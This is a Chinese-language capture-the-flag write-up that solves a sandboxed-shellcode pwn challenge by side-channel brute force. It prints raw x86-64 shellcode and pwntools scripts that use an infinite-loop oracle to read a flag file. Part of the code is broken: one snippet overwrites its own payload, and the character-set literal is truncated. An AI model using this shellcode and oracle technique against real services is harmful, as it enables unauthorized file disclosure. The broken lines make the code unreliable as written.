这题没啥意思,就是爆破。由于无法输出任何东西,需要有一个能代表猜测正确的标志,可以使用 jmp 0 的方法:如果爆破正确则 jmp 0(即 `\xeb\xfe`,原地跳转,进程不会退出),否则 jmp 到一个乱七八糟的地方造成段错误,这样通过连接是否收到 EOF(got eof)就可以判断了。

使用 shellcraft 可以获得 shellcode

```python
shellcode = asm(shellcraft.amd64.syscall('SYS_open',0x10000 + 0x30,0).rstrip())
shellcode += asm(shellcraft.amd64.syscall('SYS_read',3,0x10500,40).rstrip())
shellcode += asm("cmp rax,12")
shellcode += "\x75\x02" # jne 2
shellcode += "\xeb\xfe" # jmp 0
shellcode = shellcode.ljust(0x30,'a')
shellcode = asm(shellcraft.amd64.pushstr("/home/pwn/flag"))
```

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
context.log_level = 'debug'
context.arch = "amd64"
context.terminal = ["tmux","splitw","-h"]
for i in range(18,19):
    sh = remote("8.140.177.7",40334)
    #sh = process("./chall")
    shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x31"
    shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03"
    shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6"
    shellcode += "\x01\x04\x03\x01\x0f\x05\x48\x83\xf8"
    shellcode += struct.pack("B",i)
    shellcode += "\x75\x02\xeb\xfe\x61"
    #shellcode += "\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67\x00"
    shellcode += "../pwn/flag"
    log.success(str(i))
    sh.sendafter("box.\n",shellcode)
    sh.interactive()
    sh.close()
```

通过这个脚本可以获得 flag 的长度,同时也可以套出一个更短的访问 flag 的路径 "../pwn/flag",然后再对 flag 的内容进行爆破,脚本如下

(注:下面脚本中 `liter` 字符集的字面量在页面上被截断,`<=>` 之后的字符和结尾的引号已经丢失。)

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
context.terminal = ["tmux","splitw","-h"]
context.log_level = 'debug'
liter = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>
flag = "flag{k33p_qu14t"
#for i in range(4,18):
for j in range(0,len(liter)):
    try:
        sh = remote("8.140.177.7",40334)
        #sh = process("./chall")
        shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x34"
        shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03"
        shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6"
        shellcode += "\x01\x04\x03\x01\x0f\x05\x8a\x04\x25"
        shellcode += p32(0x10500 + 15)
        shellcode += "\x3C"
        shellcode += struct.pack("B",ord(liter[j]))
        #shellcode += struct.pack("B",ord('q'))
        shellcode += "\x75\x02\xeb\xfe\x61\x2e\x2e\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67"
        log.success(liter[j])
        #log.success(flag[j])
        sh.recvuntil("Welcome")
        #gdb.attach(proc.pidof(sh)[0])
        sh.sendafter("box.\n",shellcode)
        #sh.recvuntil(EOF)
        sh.interactive()
    except:
        sh.close()
```

最后得出 flag:`flag{k33p_qu14t!}`

最后修改:2021 年 04 月 29 日

© 允许规范转载